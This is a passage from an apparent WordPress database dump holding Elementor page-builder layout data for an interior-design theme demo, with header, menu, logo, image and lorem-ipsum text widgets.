80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f47693c\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[{\"id\":\"a76c6cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":30},\"elements\":[{\"id\":\"5fbe4bf\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_secondary_color\":\"#808080\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false},{\"id\":\"0cbe6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":5},\"elements\":[{\"id\":\"02a8f8b\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#808080\",\"link_color_hover\":\"#FFFFFF\",\"link_color_active\":\"#FFFFFF\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"20\",\"bottom\":\"5\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"64a01ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":65},\"elements\":[{\"id\":\"331f18a\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"2a1ae6f\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1600,4617,'_elementor_page_assets','a:0:{}'),(1601,4618,'_wp_page_template','default'),(1602,4618,'_elementor_edit_mode','builder'),(1603,4618,'_elementor_template_type','wp-post'),(1604,4618,'_elementor_version','3.6.6'),(1605,4618,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1606,4618,'_elementor_page_assets','a:0:{}'),(1607,4619,'_wp_page_template','elementor_header_footer'),(1608,4619,'_elementor_edit_mode','builder'),(1609,4619,'_elementor_template_type','wp-page'),(1610,4619,'_elementor_version','3.6.6'),(1611,4619,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. 